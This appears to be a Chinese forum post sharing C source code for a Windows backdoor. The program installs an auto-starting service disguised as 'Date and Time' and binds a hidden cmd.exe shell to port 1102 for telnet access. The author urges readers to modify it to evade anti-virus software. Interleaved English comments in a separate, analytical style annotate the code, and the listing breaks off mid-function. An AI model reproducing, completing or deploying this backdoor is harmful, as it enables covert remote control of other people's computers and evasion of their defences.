
定制自己的后门[推荐]

这里是一个创建windows服务的程序,绑定cmd.exe到1102口,随计算机启动而自动开启。服务的Thread就是BindCmd2Port函数,可以(最好是)自己定制。可能需要修改的变量在程序里面有注释,如果你一点都不改的话,那么用的时候一定要拷到path变量设定的目录(比如c:\winnt\system32)中,记得加上/install参数,以后telnet到1102口就可以了。

如果要改的话(最好是改一下),把那个BindCmd2Port函数整个改掉吧,我都记不得是哪里paste过来的了。

  写得匆忙,主要是急着用。本来很喜欢T-Cmd的,可是没有源代码看,只好自己写,抛砖而已,大家有玉请砸过来。

在Windows2000 Pro(???)正常(?)运行。

/*

This program creates a service which binds a

cmd.exe to port 1102(can be easily defined by

yourself). Try to modify it to escape from the

anti-virus software.

Try not paste the paste-up elsewhere.

by N.E.V.E.R@SEU

*/

#include \"windows.h\"

#include \"stdio.h\"

#pragma comment (lib, \"WS2_32.lib\")

// Global variables shared between the installer path in main() and the service code.

// TCP port the service worker (BindCmd2Port) listens on; used via htons(port).
// The original author's note allows any value 1 ~ 65535.
int port=1102;

// Name registered with the SCM by CreateService() in main(), and the name
// passed to "net start" right after installation. The buffer is 255 bytes,
// but main() also strcat()s this value into a separate 255-byte command-line
// buffer, so a name anywhere near the buffer size would overflow there.
char ServicesName[255]="Date and Time";

// Display name shown by the service manager; same literal as ServicesName.
// The name imitates a benign system component, which is what a defender
// would look for: a new auto-start service whose binary is not a system file.
char ServicesDisplayName[255]="Date and Time";

// Not referenced in the visible portion of the file; presumably signalled
// from Handler()/terminate() (bodies not shown).
HANDLE hTerminateEvent = NULL;

// Status handle for SCM reporting; presumably obtained in ServiceMain()
// (not shown) and used by SendStatusToSCM().
SERVICE_STATUS_HANDLE hServiceStatus;

// Service state flags; not referenced in the visible portion of the file.
BOOL bPauseService = FALSE;
BOOL bRunningService = FALSE;

// Worker thread handle; not referenced in the visible portion of the file.
HANDLE hThread = NULL;

// Forward declarations. Only main() and (part of) BindCmd2Port() are visible
// here; the remaining bodies are defined further down in the file.
DWORD BindCmd2Port(LPVOID);                       // service worker: listener that spawns cmd.exe per connection
BOOL SendStatusToSCM(DWORD, DWORD, DWORD, DWORD, DWORD);
BOOL InitService();
VOID Handler (DWORD);                             // SCM control handler (registered elsewhere)
VOID terminate(DWORD);
VOID ServiceMain(DWORD, LPTSTR*);                 // entry the SCM dispatcher calls (see main)

// Entry point.
//
// With exactly one argument "/install": registers this executable as an
// auto-start Win32 service under ServicesName, starts it through "net start",
// and returns. With any other arguments: behaves as the service process and
// hands control to the SCM dispatcher, which calls ServiceMain().
//
// Non-standard `void main`; nothing is returned to the caller in either path.
void main(int argc, char* argv[])
{
    if(argc==2&&!strcmp(argv[1],"/install"))
    {
        char binaryPathName[_MAX_PATH];
        // Builds:  net start "<ServicesName>"
        // tmp is 255 bytes and ServicesName is a 255-byte array, so the two
        // strcat() calls below are not bounded against tmp.
        char tmp[255]="net start \"";
        strcat(tmp,ServicesName);
        strcat(tmp,"\"");
        // The service binary is this executable's own path. The return value
        // (and possible truncation) is not checked.
        GetModuleFileName(NULL,binaryPathName,_MAX_PATH);
        // A NULL handle (e.g. insufficient rights) is not checked before being
        // passed to CreateService().
        SC_HANDLE s = OpenSCManager(0, 0, SC_MANAGER_CREATE_SERVICE);
        // Persistence mechanism: own-process service, SERVICE_AUTO_START, so it
        // is launched at boot by the SCM. No account is given (the last
        // parameters are NULL), so the service runs under the SCM default.
        // The service-creation event itself is the artifact a defender can
        // detect and remove.
        SC_HANDLE hNewService = CreateService(s, ServicesName, ServicesDisplayName,
                                             SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS,
                                             SERVICE_AUTO_START, SERVICE_ERROR_NORMAL,
                                             binaryPathName, NULL, NULL, NULL, NULL, NULL);
        if(!hNewService)
            printf("Error Creating Services...");
        else
            WinExec(tmp,0);   // start the new service now; result not checked
        // Runs on both branches (only WinExec is under the else): gives
        // "net start" time to finish before the handles are closed.
        Sleep(4000);
        CloseServiceHandle(hNewService);   // called even when hNewService is NULL
        CloseServiceHandle(s);
        return;
    }
    // Not installing: register ServiceMain with the SCM. ServiceMain is
    // defined outside the visible portion of the file.
    SERVICE_TABLE_ENTRY serviceTable[] =
    {
        { ServicesName, (LPSERVICE_MAIN_FUNCTION) ServiceMain},
        { NULL, NULL }
    };
    // Fails when the process was started from a console instead of by the SCM;
    // the message points the user at the /install path.
    if(!StartServiceCtrlDispatcher(serviceTable))
    {
        printf("Failed at StartServiceCtrlDispatcher..\n");
        printf("or you run this .exe directly? Try \n %s /install",argv[0]);
        return;
    }
}

DWORD BindCmd2Port(LPVOID lp)

{

char cmdLine[] = \"cmd.exe\";

SOCKET s=INVALID_SOCKET;

WSADATA WSAData;

int ret;

char Buff[2048];

HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;

unsigned long lBytesRead;

SECURITY_ATTRIBUTES sa;

if (WSAStartup(MAKEWORD(2,2), &WSAData)!=0)

return 0;

if((s=socket(AF_INET, SOCK_STREAM, 0))==INVALID_SOCKET)

{

closesocket(s);

WSACleanup();

return 0;

}

sockaddr_in addr;

addr.sin_family = AF_INET;

addr.sin_addr.S_un.S_addr = htonl(INADDR_ANY);

addr.sin_port = htons(port);

if(bind(s,(sockaddr*)&addr,sizeof(addr))==SOCKET_ERROR)

return 0;

if(listen(s,1)==SOCKET_ERROR)

return 0;

int temp=sizeof(addr);

while(1){

s=accept(s,(sockaddr*)&addr,&temp);

sa.nLength=12;

sa.lpSecurityDescriptor=0;

sa.bInheritHandle=TRUE;

CreatePipe(&hReadPipe1,&hWritePipe1,&sa,0);

CreatePipe(&hReadPipe2,&hWritePipe2,&sa,0);

STARTUPINFO siinfo;

PROCESS_INFORMATION ProcessInformation;

ZeroMemory(&siinfo,sizeof(siinfo));

siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;

siinfo.wShowWindow = SW_HIDE;
